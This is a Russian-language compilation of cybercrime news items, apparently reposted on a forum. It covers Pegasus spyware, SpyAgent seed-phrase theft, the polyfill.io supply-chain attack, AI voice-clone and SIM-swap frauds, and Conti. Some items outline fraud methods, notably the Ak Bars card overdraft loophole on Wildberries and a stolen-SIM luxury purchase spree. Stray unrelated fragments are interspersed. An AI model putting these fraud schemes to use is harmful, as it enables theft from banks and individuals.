В подмосковной Ивантеевке в одном из отделений Сбербанка, где утром грабители взорвали банкомат, продолжают работу следователи. Уже известно, что бандиты накачали стальной ящик газом, но перестарались, в результате один погиб на месте, второму удалось скрыться, однако на улицу он выбегал в горящих ботинках. Нам удалось достать кадры того как все случилось - эту съемку комментирует наш корреспондент Сергей Деянов.
The list of high-severity flaws includes a privilege escalation issue in the Intel Solid State Drive (SSD) Toolbox, and a denial-of-service (DoS) flaw in the XMM 7360 Cell Modem.
В Великобритании подали иск в связи с использованием шпионского ПО Pegasus. Журналисты и активисты, чьи телефоны были взломаны в период с 2018 по 2020 год, обратились в лондонскую полицию, обвинив 5 человек в причастности к атаке. По версии заявителей, взлом был осуществлён с использованием шпионского ПО Pegasus. Предполагается, что за атакой стоят правительственные структуры Саудовской Аравии, ОАЭ и Бахрейна.
Суть жалобы заключается в нарушении британского закона о злоупотреблениях компьютерами 1990 года. Обвиняемые, по мнению пострадавших, несут ответственность за продажу ПО Pegasus странам, известным репрессиями в отношении правозащитников и критиков власти. Жалоба [подготовлена](https://www.glanlaw.org/single-post/new- criminal-complaint-over-pegasus-spyware-hacking-of-journalists-and-activists- in-the-uk) организацией Global Legal Action Network (GLAN) в интересах пострадавших.
Среди жертв Pegasus числят:
- Анас Аль-Тикрити: основатель британского фонда Cordoba Foundation, который занимается продвижением межкультурного диалога. Организация часто критиковала правительства стран Ближнего Востока, в частности ОАЭ.
- Аззам Тамими: журналист и политический активист палестинского происхождения, основатель телеканала Al-Hiwar. Известен своей критикой властей Саудовской Аравии.
- Мохаммед Козбар: председатель мечети Файнсбери-Парк в Лондоне, выступающий против политики ОАЭ.
- Юсуф Аль-Джамри: активист из Бахрейна, который получил убежище в Великобритании после преследования на родине за правозащитную деятельность.
Click to expand...
Обвинения предъявлены ряду структур, связанных с разработкой и распространением Pegasus, включая израильскую компанию NSO Group, люксембургскую Q Cyber Technologies, а также британскую инвестиционную компанию Novalpina Capital, которая в 2019 году выкупила долю NSO. Pegasus широко известен как инструмент, используемый для подавления правозащитников, и даже упоминался в связи с убийством журналиста Джамаля Хашогги в консульстве Саудовской Аравии в Стамбуле.
Жалоба также подчеркивает, что использование Pegasus на территории
Великобритании представляет угрозу национальной безопасности. Программное
обеспечение применялось для атак на правительственные сети, в том числе Офис
премьер-министра и МИД, а также для взлома телефона члена Палаты лордов Фионы
Шэклтон, когда она представляла в суде принцессу Хайю из Дубая.
Анас Аль-Тикрити заявил, что использование подобных технологий для
преследования политических активистов является серьёзным нарушением личной и
общественной безопасности. Он также подчеркнул необходимость международного
расследования действий компаний, работающих в сфере кибербезопасности,
которые, по мнению Аль-Тикрити, выходят за рамки дозволенного и ставят под
угрозу жизнь людей.
Юсуф Аль-Джамри был потрясён, когда узнал, что сотрудники службы безопасности, которые пытали его в Бахрейне, смогли взломать его телефон на британской территории. По словам Аль-Джамри, такие кибератаки на личную жизнь должны рассматриваться столь же серьёзно, как и взлом банковских систем. Он настаивает, что виновные должны понести ответственность
Юридическая фирма Bindmans, представляющая интересы пострадавших, выразила надежду, что это уголовное дело станет поворотным моментом в борьбе за права правозащитников, пострадавших от шпионского ПО
Исследователи McAfee обнаружили новый тип мобильного ПО SpyAgent для Android, реализующую технологию оптического распознавания символов OCR для кражи фраз мнемонических ключей из изображений на устройстве. Мнемонический ключ — это, по сути, фраза из 12-24 слов, которая обеспечивает восстановление доступа к криптокошельку в качестве резервного ключа. Такие секретные фразы являются крайне востребованной целью для злоумышленников, поскольку получение к ним доступа позволит им завладеть как кошельком, так и средствами на нем. Поскольку такой ключ трудно запомнить, его часто скриншотят и хранят в изображениях на мобильном устройстве, нежели чем отдельно выписанную фразу на бумажке в безопасном месте. Замеченная McAfee вредоносная кампания затронула как минимум 280 APK, распространяемых за пределами Google Play с помощью SMS или вредоносных сообщений в социальных сетях. Некоторые из заряженных приложений для Android выдают себя за государственные сервисы, сайты знакомств и порноресурсы. Основной таргет пришелся на Южную Корею, но McAfee заметила планвное расширение географии атака в сторону Великобритании. При этом выявлены также и признаки того, что версия для iOS находится на стадии разработки. После заражения нового устройства SpyAgent начинает отправлять на свой C2 следующую конфиденциальную информацию: список контактов (для дальнейшего распространения), входящие SMS с OTP, пригодные для OCR изображения, а также общую информацию об устройстве. SpyAgent также способна получать команды с C2 для изменения настроек звука или отправки SMS-сообщений, которые, вероятно, используются для рассылки фишинговых текстов с целью распространения вредоносного ПО. Как удалось выяснить McAfee, операторы SpyAgent особо не соблюдали надлежащие меры безопасности при настройке своих серверов, что позволило исследователям получить к ним доступ. Изучив панель администратора, а также украшенные файлы и данные, McAfee смогли идентифицировать ряд жертв вредоносного ПО, одной из которых оказалось устройство Apple iPhone c iOS 15.8.2 с системным языком, установленным на упрощенный китайский («zh»). При этом если изначально вредоносное ПО взаимодействовало со своим C2 посредством простых HTTP-запросов, то последняя версия использует соединения WebSocket. Украденные изображения обрабатываются и сканируются с помощью OCR на стороне сервера, а затем соответствующим образом организуются на панели администратора, что обеспечивает оперативность использования в атаках. Следует отметить, что технология OCR не нова в киберподполье, в июле 2023 Trend Micro находила два семейства вредоносных ПО для Android под названием CherryBlos и FakeTrade, распространявшихся через Google Play. Так что можно смело констатировать, что такая тактика начинает набирать популярность.
В двух российских регионах отключат мобильный интернет LTE на несколько
ночей
В Псковской и Новгородской областях с 25 по 30 января не будет работать мобильный интернет LTE в ночное время.
Губернатор Псковской области Михаил Ведерников сообщил, что «в связи с проведением технических работ по перенастройке радиочастотного спектра передающего оборудование» с 25 по 30 января с 23:00 до 06:00 в области не будет работать мобильный интернет стандарта LTE «всех операторов связи».
«Интернет в формате 3G работать будет, но он устарел, и на многих территориях его просто нет. Поэтому будут сбои.Учитывайте эту информацию. В частности, по ночам будет сложно вызывать такси по мобильным приложениям и пользоваться банкоматами», — говорится в посте главы региона.
Кроме того, министерство цифрового развития Новгородской области объявило, что ежедневно с 25 по 30 января в период с 23:00 до 06:00 будет отключен мобильный интернет LTE стандарта 4G на всей территории области. Такое решение объяснили «проведением технических работ по перенастройке частот вещания».
Forbes [сообщил](https://www.forbes.ru/tekhnologii/504976-vlasti- predupredili-ob-otsutstvii-lte-v-pskovskoj-oblasti-neskol-ko-nocej-podrad), что МТС, «Вымпелком», «Мегафон», Tele2, «Ростелеком» и Роскомнадзор отказались от комментариев. В службах поддержке МТС, «Мегафона» и «Билайна» сообщили, что у них нет данных о готовящихся ограничениях.
Click to expand...
[(c) meduza.io](https://meduza.io/news/2024/01/25/v-dvuh-rossiyskih-regionah- otklyuchat-mobilnyy-internet-lte-na-neskolko-nochey)
От себя добавлю - не существует никаких "технических работ", из-за которых
нужно отключать LTE сразу у всех присутствующих на некой территории операторов
связи.
Единственное для чего это делается - упрощение использования спецслужбами и
аффилированными с ними лицами/организациями - комплексов перехвата информации
в сетях мобильной связи или пеленгации абонентских устройств (телефоны,
модемы).
Дополнительно раньше отключали еще и шифрование А5.1 в сети 2G.
Кому интересно - некоторые подробности есть тут
https://www.cnews.ru/news/top/drama_s_zalozhnikami_sorm_v_dejstvii
Т.к. отключение интернета будет строго по расписанию - похоже на то что проводят какие-то учения.
Второй вариант - угроза прилёта дронов которые управляются через LTE.
В любом случае - умельцам с 2G осмоком-моторолами выпал шанс протестировать свои девайсы ))
Белорусские киберпреступники получили доступ к базе данных ВСЕХ жителей страны.
Хакерская группа «Belarusian Cyber Partisans» заявила в своем Twitter, что
превратила паспорт президента Белоруссии в NFT.
Это заявление они сделали прям в день рождение самого Лукашенко.
[](https://www.securitylab.ru/upload/images/content- img(356).png)
Киберпартизаны также опубликовали паспортные данные других политиков Белоруссии, среди которых:
Хактивисты написали в своем Telegram-канале ,
что создали NFT-коллекцию паспортов на торговой площадке OpenSea. Однако,
коллекция была удалена платформой менее чем через 24 часа после публикации.
Так же они заявили, что ищут альтернативные способы для продажи своей
коллекции.
[](https://www.securitylab.ru/upload/images/content- img(357).png)
Киберпартизаны активно противостоят режиму Лукашенко. В 2021 году они получили доступ ко всей базе данных «АИС Паспорт» с личными данными каждого гражданина Беларуси, включая фотографии в паспорте, домашний адрес и место работы.
Источник: https://www.securitylab.ru/news/533671.php
Томас Уайт, один из основателей организации Distributed Denial of Secrets (DDoSecrets), недавно раскрыл информацию о своем криминальном прошлом. После отбытия пятилетнего тюремного срока Уайт поделился подробностями своей деятельности с изданием 404 Media.
DDoSecrets, созданная Уайтом совместно с Эммой Бест в 2018 году, стала ключевой платформой для публикации масштабных утечек данных, заполнив нишу, ранее занимаемую WikiLeaks. Однако выяснилось, что до основания DDoSecrets Уайт был глубоко вовлечен в криминальную деятельность в даркнете.
В конце 2013 года, после того как ФБР закрыло известный наркоторговый маркетплейс Silk Road и арестовало его создателя Росса Ульбрихта, Уайт взял на себя роль его преемника. Под псевдонимом Dread Pirate Roberts 2.0 он, вместе с пользователем Defcon (позже идентифицированным как бывший сотрудник SpaceX Блейк Бенталл), запустил Silk Road 2.0. По словам следователя Национального агентства по борьбе с преступностью Пола Чоулза, Уайт «был боссом» этой операции.
Криминальная деятельность Уайта не ограничивалась наркоторговлей. В ноябре 2014 года он был арестован, и при обыске его квартиры в Ливерпуле полиция обнаружила ноутбук, содержащий 464 изображения жестокого обращения с детьми категории A - самой тяжелой по классификации. Кроме того, выяснилось, что Уайт обсуждал с администратором Silk Road 2.0 идею создания веб-сайта для педофилов, утверждая, что на этом можно заработать деньги. Позднее он пояснил, что его слова были сказаны скорее в качестве провокации для размышления и не отражали его истинных намерений.
Несмотря на криминальное прошлое, в 2015 году Уайт начал сотрудничество с Эммой Бест, используя псевдоним The Cthulhu для различных проектов по архивированию и утечке данных. Это сотрудничество в итоге привело к созданию в 2018 году DDoSecrets, где Уайт занимался техническими аспектами, включая регистрацию домена и настройку серверов. По его словам, правоохранительные органы и разведывательные службы, вероятно, знали о его участии, поскольку сервер изначально был зарегистрирован на его имя.
Эмма Бест подтвердила, что все участники DDoSecrets знали о прошлом Томаса Уайта. Информация об этом не была обнародована ранее, чтобы обеспечить безопасность работы команды и избежать возможных юридических проблем для Уайта, связанных с его участием в проекте.
Дело Уайта оставалось под строгими ограничениями на освещение в СМИ до момента его заключения. В 2019 году его приговорили к пяти годам и четырём месяцам тюремного заключения после признания вины в торговле наркотиками, отмывании денег и создании непристойных изображений детей. Он утверждает, что не имел прямого участия в работе DDoSecrets во время отбывания наказания.
• Source: https://www.404media[.]co/co-founder-of-ddosecrets-was-dark-web- drug-kingpin/
Осужденный в США за кибермошенничество россиянин Роман Селезнев рассказал, что его дважды чуть не убили в тюрьме, а условия содержания назвал плохими. С таким заявлением он выступил в эфире «Первого канала».
По словам Селезнева, его «похитили» с Мальдивских островов, привезли в США, «посадили в карцер и обращались очень плохо». После этого он сменил несколько тюрем, а в одной из них — в Атланте — все заключенные носили ножи. «Дня не было, чтобы кто-то кого-то не порезал. Я старался от них держаться [подальше], но пару случаев было, что меня чуть не убили там», — сказал Селезнев.
Россиянин отметил, что администрация учреждений «будила его каждые два часа», «заставляла отмечаться», «включала свет как прожектор». Он также назвал плохими условия содержания и питание.
1tv.ru/n/482331
Исследователи предупредили об атаке на цепочку поставок, затронувшей более 100 000 сайтов, использующих cdn.polyfill[.]io. Дело в том, что домен приобрела китайская компания, после чего скрипт был модифицирован для перенаправления пользователей на вредоносные и мошеннические сайты.
Термином polyfill («полифил») обозначают код, реализующий какую-либо функциональность, которая не поддерживается в некоторых версиях браузеров. Например, полифил может добавлять JavaScript-функциональность, которая недоступна для старых браузеров, но уже присутствует в современных.
Сервис polyfill[.]io используется множеством сайтов, чтобы все их посетители могли пользоваться одной и той же кодовой базой, даже если их браузеры не поддерживают какие-то современные функции.
НО на этой неделе специалисты компании Sansec забили тревогу и предупредили, что в начале текущего года сервис и домен polyfill[.]io были [приобретены](https://web.archive.org/web/20240229113710/https:/github.com/polyfillpolyfill/polyfill- service/issues/2834#issuecomment-1963842875) китайской компанией Funnull, после чего скрипт был модифицирован для внедрения вредоносного кода на сайты. То есть произошла масштабная атака на цепочку поставок.
«В феврале текущего года китайская компания выкупила домен и связанный с ним аккаунт на Github. С тех пор этот домен был замечен за внедрением вредоносного кода на мобильные устройства через любой сайт, где размещен cdn.polyfill.io», — пишут эксперты Sansec.
Click to expand...
В феврале 2024 года, вскоре после новости о покупке разработчик оригинального проекта, Эндрю Беттс, предупредил, что он никогда не был владельцем polyfill[.]io и не имел к нему отношения, а всем владельцам сайтов следует немедленно избавиться от этого кода. Беттс, создавший опенсорсный проект polyfill еще в середине 2010-х годов, вообще посоветовал людям прекратить использовать polyfill[.]io, так как в современном мире в этом уже нет никакой нужды.
Дошло до того, что для снижения рисков потенциальной атаки на цепочку поставок Cloudflare и [Fastly](https://community.fastly.com/t/new-options-for-polyfill-io- users/2540) (где теперь работает Беттс) создали собственные зеркала сервиса, чтобы сайты могли продолжать пользоваться надежной версией.
Увы, в итоге опасения разработчика полностью оправдались: CNAME запись polyfill[.]io была изменена на polyfill[.]io.bsclink.cn, который поддерживается новыми владельцами. В результате, когда разработчики встраивали скрипты cdn.polyfill[.]io на свои сайты, они получали код непосредственно с сайта китайской компании.
Вскоре администраторы начали замечать, что новые владельцы внедряют вредоносный код, перенаправляющий посетителей на нежелательные ресурсы без ведома владельцев сайтов.
Эксперты Sansec приводят пример, в котором модифицированный скрипт используется для перенаправления пользователей на скамерские сайты, например, фейковый сайт Sportsbook. Для этого используется фальшивый домен Google analytics (www.googie-anaiytics[.]com) или редиректы типа kuurza[.]com/redirect?from=bitget.
По словам исследователей, полностью проанализировать модифицированный скрипт весьма сложно, поскольку он использует очень специфические таргетинг и устойчив к реверс-инжинирингу.
«Код имеет специальную защиту от реверс-инжиниринга и активируется только на определенных мобильных устройствах в определенные часы, — рассказывают в Sansec. — Вредоносный код динамически генерирует полезную нагрузку на основе HTTP-заголовков, активируется только на определенных мобильных устройствах, ускользая от обнаружения, избегает пользователей-администраторов и откладывает выполнение. Кроме того, код обфусцирован».
Click to expand...
Пока пользователей перенаправляют на сайты спортивных ставок или ресурсы для взрослых (вероятно, основываясь на их местоположении), однако в любой момент могут быть реализованы новые атаки, включая перехват форм, перехват кликов и кражу данных.
В настоящее время домен cdn.polyfill[.]io и вовсе перенаправлен на Cloudflare по непонятным причинам. Однако, поскольку DNS-серверы домена остаются неизменными, владельцы могут в любой момент переключить его обратно на собственные домены.
ИБ-компания Leak Signal создала специальный сайт Polykill.io, который позволяет находить сайты, использующие cdn.polyfill[.]io, и предоставляет информацию о переходе на альтернативные решения.
Кроме того, компания Google начала уведомлять рекламодателей об этой атаке на
цепочку поставок, предупреждая, что их целевые страницы содержат вредоносный
код и могут перенаправлять посетителей на другие ресурсы без ведома или
разрешения со стороны владельца сайта.

Компания предупреждает, что Bootcss, Bootcdn и Staticfile так же вызывают
нежелательные перенаправления, что потенциально добавляет тысячи, если не
сотни тысяч сайтов в список пострадавших.
Google сообщает, что если при регулярной проверке будут обнаружены такие редиректы, соответствующая реклама будет отклонена. Многие рекламодатели уже жалуются на [Shopify](https://community.shopify.com/c/shopify-discussions/bad- link-detected-by-google/m-p/2628208/page/2), что Google не принимает их рекламу примерно с 15 июня, если обнаруживает редирект googie-anaiytics.
В Якутском отделении полиции №3 раздался тревожный звонок. Стражи порядка насторожились, но трубку не взяли. Когда звонок повторился в 5-й раз, пришлось все-таки ответить. "Меня обманули телефонные мошенники и я уже еду к вам!", — сообщили на том конце провода, поэтому слиться было не вариант. Спустя несколько минут в участок прибыла взволнованная женщина и отправилась к дознавателю. После краткого опроса сотрудник подумал, что к нему прибыла обычная дурочка, которая повелась на классическую схему с переводом на "безопасные счета", пока не начал вникать в детали...
Оказывается, жертва была в курсе про существующие схемы развода и даже считала себя недоверчивой, но то, что с ней провернули мошенники было по-настоящему виртуозной работой. История началась со звонка якобы от шефа — скамерсанты связались с женщиной в Telegram с фейкового аккаунта, имитировавшего реальный, а голос сгенерировали с помощью нейросети.
Липовый шеф рассказал, что ему позвонили правоохранители и попросили передать, что средства на счетах женщины в опасности и нужно срочно принять меры. Так же начальник сообщил, что звонить он будет сам и перезванивать ему не нужно, так как задание очень секретное.
Далее с якуТяночкой связался "сотрудник ФСБ" по видеосвязи, который не стеснялся показывать лицо на камеру и натыкал в нее ксивой. Ему удалось убедить мадам в том, что дело действительно серьезное. После этого женщину перенаправили на сотрудника Центробанка, который тоже пообщался с ней по видеосвязи и даже показал свой офис, стилизованный под реальный ЦБ.
Схема и актерская игра были на высоте, поэтому бедолага полностью поверила в легенду. Далее наступил заключительный этап. Банк. Кредит. И вот, 3 миллиона улетают на неизвестные счета. Осознание к женщине пришло только тогда, когда скамеры перестали выходить на связь.
Правоохранители отделения по противодействию киберпреступности Первомайского РУВД Минска в конце сентября выявили пять фактов незаконной предпринимательской деятельности, связанной с оборотом криптовалюты. Об этом сообщили в ГУВД Мингорисполкома.
Следствие установило, что трое минчан, житель Гродно и жительница Пинска предлагали свои услуги по купле-продаже криптовалюты на профильных интернет- площадках и совершали сделки. В результате незаконной предпринимательской деятельности с января по сентябрь пятеро белорусов провели через свои криптокошельки более Br180 тыс. Правоохранители составили административные протоколы за незаконную предпринимательскую деятельность. Санкцией статьи предусмотрен крупный штраф и обращение в доход государства всей прошедшей через криптокошельки суммы.
Милиция напоминает, что в соответствии с Декретом Президента "О развитии цифровой экономики" для физических лиц (нерезидентов Парка высоких технологий) предпринимательская деятельность по обороту криптовалюты запрещена.
Новостную статью пишу первый раз, в целях осветить тему, которая вспыхнула
сегодня ночью.
Карты российского банка Ак Барс можно уводить в овердрафт на суммы от 500 тыс.
руб (для физ. лиц) и до 33 млн. руб (для ЛК крупных бизнесов в РФ).
Мошенники заказывают товары на Российском маркетплейсе Wildberries, используя
в качестве оплаты карту Банка Ак Барс.
Оплата проходит даже если на карте 0 RUB, после оплаты карта блокируется, но
заказ успешно обрабатывается и принимается в доставку.
На форумах по продаже дебетовых карт и личных кабинетов экстренно сняли все
лоты с продажей банков Ак Барс, людям массово предлагают "принять код" или
"продать свой ЛК"
НИ В КОЕМ СЛУЧАЕ НЕ ДЕЛАЙТЕ ЭТОГО!!! РАБОТАТЬ ПО РУ - НЕЛЬЗЯ!!! ОПАСНО ДЛЯ
ЖИЗНИ!!!!
Примерная сумма ущерба в ночь с 15.08 по 16.08 - 400 млн руб (P.S это только из того, что насчитал лично я)
По неподтвержденным данным - схема перестала работать сегодня в 8:00 утра по Московскому времени
Житель американского Хьюстона (штат Техас) стал жертвой грабителя, укравшего не только его кредитную карточку, но и вытащившегося сим-карту из телефона. ABC13, что после этого с его счета на дорогие покупки списались 74 тысячи долларов. Суммарно вся операция заняла у вора 70 минут.
Саму кражу он совершил в местном спортзале Lifetime Fitness. После того, как жертва оставила в шкафчике свои вещи, в том числе телефон и бумажник, грабитель вскрыл кабинку, достал кредитную карту и извлек сим-карту.
«Я даже не думал о своем телефоне, когда уходил с тренировки, но в какой-то момент показалось странным, что мне не приходят никакие оповещения. Тогда я внимательно посмотрел на экран и увидел надпись о том, что в данный момент нет обслуживания сети из-за отсутствия сим-карты», — вспоминает мужчина, попросивший не раскрывать его имени.
Судя по всему, сам грабеж был достаточно детально проработан. При покупке мошенник предъявил поддельные водительские права из Аризоны на имя жертвы, но со своей фотографией. Совершив первые покупки на 30 тысяч долларов в Louis Vuitton, он направился в магазин Rolex. При попытке проведения оплаты за две пары часов стоимостью 44 тысячи долларов кредитка American Express сначала выдала отказ в транзакции, после чего телефон покупателя зазвонил: чтобы верифицировать перевод денег за часы сотрудник банка позвонил на ту самую украденную сим-карту. Получив устное подтверждение мошенника, что он пытается купить часы, банк одобрил транзакцию.
После этого мошенник попытался купить еще две пары часов, однако пришедшему в зал владельцу магазина он показался подозрительным. Покупатель спешно ретировался, а сотрудники бутика потом вспомнили, что этот человек уже приходил в него за неделю до инцидента: ничего не купил, но внимательно рассматривал витрины. Это может быть еще одним доказательством тщательного планирования всего произошедшего. В итоге жертве пришлось заблокировать свои карточки, а вот грабителя не только не нашли, но даже не смогли идентифицировать его личность по камерам.
source: abc13.com/only-on-13-man-steals-credit-card-sim-stolen-lifetime- fitness-theft/13166409
Злоключения Conti не закончились с их децентрализованным уходом под вывески других группировок. Штаты всё так же предлагают $10 миллионов за информацию о них. Только теперь благодаря недавним сливам Штирлица в их рядах поиск сузился до пяти ключевых членов. В наличии предполагаемое фото одного из Conti- воротил.
Ники у подозреваемых не очень отечественные за исключением неких Профессора и Решаева. Но вот шапочка на фото весьма характерная. На нём якобы изображён некто Target, офис-менеджер группировки с опытом работы в органах. «Это член Conti известный как Target?» — интересуется госдепартамент США. Что ж, узнаем в следующих сериях.
Согласно материалам, недавно направленным в суд США, Амир Хоссейн Гольшан, 24-летний мужчина, занимающийся мошенничеством методом SIM-Swapping , завладел аккаунтами нескольких медийных личностей в Instagram и на протяжении определённого времени шантажировал их. Для возврата учётных записей мошенник предлагал своим жертвам пойти с ним на свидание или прислать откровенные видео.
В жалобе, написанной специальным агентом ФБР, который входит в состав Целевой группы Лос-Анджелеса по борьбе с кибермошенничеством, говорится, что ФБР идентифицировало высотную квартиру мужчины в январе 2023 года после расследования его предполагаемой причастности к серии случаев мошенничества с SIM-картами.
Согласно озвученным данным, чаще всего Гольшан взламывал аккаунты популярных личностей в Instagram и отправлял сообщения их друзьям с просьбой «занять денег». Также он требовал денежный выкуп у самих жертв, чтобы вернуть доступ к аккаунту. Но финансовый шантаж вскоре перестал устраивать злоумышленника и он пошёл ещё дальше.
В одном из случаев, как утверждается, мужчина инициировал видеозвонок со своей жертвой и заставил её раздеться на камеру. Потерпевшая рассказала ФБР, что видеозвонок длился около часа, и она «пыталась быть с ним милой, чтобы он вернул ей аккаунт». В ходе этого разговора Гольшан зачем-то рассказал своей жертве об ещё нескольких совершённых им преступлениях со взломом, которые он описал в подробностях. Об этих преступлениях потерпевшая так же сообщила ФБР. Судя по заявлению девушки, Гольшан вернул ей аккаунт, однако потом неоднократно звал её на личные свидания. Каждый раз получая отказ, мужчина снова взломал Instagram-аккаунт жертвы и затем полностью удалил его.
ФБР также получило данные от биржи криптовалют Coinbase о предполагаемом использовании платформы Гольшаном. Записи показали, что на криптокошельки мужчины было зачислено суммарно больше 420 тысяч долларов в период с декабря 2018 года по апрель 2022 года. А его банковские операции показали, что он получил суммарно около 24 тысяч долларов в виде переводов от разных людей. Причём в большинстве случаев в этих платежах упоминались логины Instagram и слово «проверка».
В конце концов ФБР выследило злоумышленника, определив геопозицию его телефона. Мужчина проживал в роскошных апартаментах в Лос-Анджелесе. Это подтверждает, что своими мошенническими действиями он заработал немало денег.
Но справедливость наконец восторжествовала, и мошенник ответит за все совершённые им преступления.
• Source: hххps://storage.courtlistener.com/recap/gov.uscourts.cacd.874333/gov.uscourts.cacd.874333.1.0.pdf
Москва. 9 марта. INTERFAX.RU - Пользователям Госуслуг рекомендуется установить
браузеры, которые поддерживают российский сертификат безопасности связи,
например, "Яндекс.Браузер" и "Атом", для лучшего доступа к порталу и другим
сайтам, говорится в сообщении Минцифры.
"Некоторые сайты сейчас могут не открываться. Это связано с проблемами в
работе центров сертификации, которые проверяют безопасность и надёжность
интернет-ресурсов. Чтобы иметь доступ ко всем сайтам и нужным онлайн-сервисам,
в том числе к Госуслугам, рекомендуем установить браузеры, которые
поддерживают российский сертификат", - говорится в сообщении Минцифры,
разосланном пользователям Госуслуг.
В нём уточняется, что "сейчас такая функциональность есть, например, у
"Яндекс.Браузера" или Атома".
Браузер Atom разработан компанией Mail.ru Group (сейчас VK), это браузер с
синхронизацией VK Connect.
4 марта Минцифры сообщило, что в ближайшее время будут приняты нормативно-
правовые акты, регулирующие работу национального удостоверяющего центра по
бесплатной выдаче TLS-сертификатов российским юридическим лицам, что поможет
пользователям сохранить безопасный доступ к сайтам, у которых был отозван TLS.
TLS (Transport Layer Security) - криптографический протокол для организации
безопасной связи в интернете.
В ведомстве уточнили, что получить TLS-сертификат можно будет на портале
Госуслуг в полностью дистанционном режиме. Все браузеры и операционные системы
должны будут поддержать работу TLS-сертификатов на сайтах, которые их получат,
а полный перечень доменов, на которые выданы сертификаты, можно будет увидеть
на портале Госуслуг.
Их подозревают в неправомерном обороте средств платежей.
«В Тверской суд Москвы поступили ходатайства следствия об избрании меры пресечения в виде заключения под стражу в отношении шестерых человек, подозреваемых в совершении преступления, предусмотренного ч. 2 ст. 187 УК РФ («Неправомерный оборот средств платежей»)», — сообщают в МВД.
«По данным следствия, они обладают специальными познаниями в сфере международных платежных систем и подозреваются в совершении преступлений в сфере компьютерной технологии, техники и информационно-коммуникационной сети интернет», — отметили в суде.
Задержаны генеральный директор ООО «Кинокомпания «Саратовфильм» Денис Пачевский, индивидуальный предприниматель Александр Ковалев, сотрудник ООО «Транстехком» Артем Быстрых, сотрудник компании ООО «Гет-нет» Артем Зайцев и двое неработающих — Владислав Гилев и Ярослав Соловьев.
Данная группировка стала третьей, чья деятельность была пресечена правоохранителями с начала 2022 года.
В Забайкалье ФСБ задержала банду хакеров, взламывавших «Госуслуги» бойцов СВО.
В Забайкальском крае сотрудники ФСБ и МВД задержали членов преступной группировки, которые взламывали личные кабинеты сервиса «Госуслуги» и онлайн- банков россиян. Об этом «Ленте.ру» сообщили в пресс-службе регионального управления ФСБ России.
По данным силовиков, хакеры с 2022 года получали доступ к сервисам граждан, в числе которых были участники специальной военной операции (СВО). На них задержанные оформляли займы в банках и микрокредитных организациях, после чего выводили деньги через цепочку банковских счетов и криптокошельков.
В домах задержанных прошли обыски, были изъяты телефоны, компьютеры, сим- карты, банковские карты и портативные носители информации. Возбуждено уголовное дело, ущерб потерпевшим оценивается в сумму более трех миллионов рублей.
Ранее сообщалось, что в Петербурге хакеры взломали аккаунты десяти граждан на «Госуслугах» и оформили на них кредиты.
Киевские правоохранители установили личности четырех жителей Черкасс в возрасте от 21 до 25 лет предположительно причастных к вымогательству криптовалюты у знакомого им столичного предпринимателя.
По данным следствия, подозреваемые пришли в квартиру потерпевшего и потребовали перевести все имеющиеся у него цифровые активы на их счет.
Бизнесмен попытался убежать, однако злоумышленники догнали его, избили и сломали ногу. После этого мужчина все же отправил на их кошельки криптовалюту на сумму около $28 000.
Кроме того, нападавшие вынесли из квартиры документы и ценные вещи.
В ходе обысков, проведенных в Киеве и Черкассах, правоохранители изъяли мобильные телефоны, банковские карты и деньги. Также у одного из подозреваемых обнаружили около 300 боеприпасов к автоматическому оружию.
Решается вопрос об избрании фигурантам меры пресечения.
Напомним, в феврале четверо неизвестных мужчин напали на проживающего на Бали российского инвест-блогера и заставили его перевести $284 000 в криптовалюте.
Собственно не буду ходить да около . Кто из парней сможет помочь то мне помогут
Российская «тусовка» спамеров, зарабатывавшая на нелегальной продаже фармацевтических препаратов в интернете, активно боролась с разработчиками антиспам- фильтров. Как утверждает американский журналист Брайн Кребс, россияне атаками и угрозами вынудили закрыться компанию Blue Security, разработавшую инновационный метод борьбы со спамом, и собрались средства для атаки против организации Spamhaus.
О проблемах борцов со спамом
В США вышла книга журналиста Брайана Кребса (Brain Krebs) “Spam Nation”, посвященная российским спамерам и киберпреступности. В числе прочего в книге рассказывается о том, как спамеры атаковали организации, пытавшиеся противостоять распространению спама.
Одной из неудачных попыток противостоять распространению является компания Blue Security, созданная израильскими эмигрантами из СССР и имевшая офис в США. Компания предложила инновационную технологию борьбы со спамом и привлекла $4 млн венчурного финансирования. По состоянию на 2006 г. у компании было более 500 тыс. платных пользователей, установивших разработанное компанией приложение Blue Frog.
Идея Blue Security состояла в том, чтобы атаковать спамеров до тех пор, пока они не исключат клиентов компании из их адресных баз. Такая тактика приносила плоды, но раздражала самих спамеров. В те годы основным источником спама были партнерские программы по нелегальной продаже фармацевтических препаратов в интернете.
Как были связаны спам и фармацевтика
Через такого рода партнерские программы пользователям из США и Европы предлагалось приобретать так называемые «дженерики»: произведенные в странах Азии поддельные препараты, схожие по свойствам с известными лекарствами. «Дженерики» стоят значительно дешевле оригинальных препаратов, а для их приобретения не требуется рецептов. Любой желающий веб-мастер мог вступить в партнерские программы и, сделав свою витрину, получать проценты с продаж. Главным источником «маркетинга» в таких программах был спам.
В создании партнерских программ преуспели, в первую очередь, российские хакеры. Основной партнерской программой по распространению фармацевтических препаратов в интернете до 2010 г были Glavmed и Spamit, созданные россиянином Игорем Гусевым. Для рассылки спама, как правило, используются ботнеты: сети из большого числа зараженных компьютеров, владельцы которых не знают об их участии в рассылке спама.
Как российские спамеры уничтожили бизнес Blue Security
Главной площадкой для «тусовки» российских спамеров был форум Spamdot.biz. Журналы оставленных на этом форуме сообщений имеются в распоряжении Брайана Кребса. Именно на Spamdot.biz спамеры стали обсуждать меры по борьбе с Blue Security. Спамеры осознали, что предложенная компанией идея содержит серьезную уязвимость. Спамерам, согласившимся сотрудничать с компанией, предлагалось установить специальное ПО, блокирующее отправку спама на адреса клиентов Blue Security. Сама адресная книга в данном ПО была зашифрована.
Но спамеры догадались, что если сравнить их базы рассылки с перечнем пропущенных Blue Security сообщений, то можно будет вычислить адреса клиентов Blue Security. Далее на их адреса были отправлены сообщения с угрозами. В них утверждалось, что деятельность Blue Security незаконна, что жертвами компании становятся, в том числе, ресурсы, не связанные со спамом, а за самой компанией стоят бывшие спамеры.
Авторы послания предупреждали клиентов Blue Security, что устанавливаемое ими ПО Blue Frog создает на их компьютерах backdoor («черный вход» для управления компьютером злоумышленниками), с помощью которого можно устраивать DDoS-атаки и производить рассылки спама, в том числе содержащего порнографию и предложения по продаже фармацевтических препаратов.
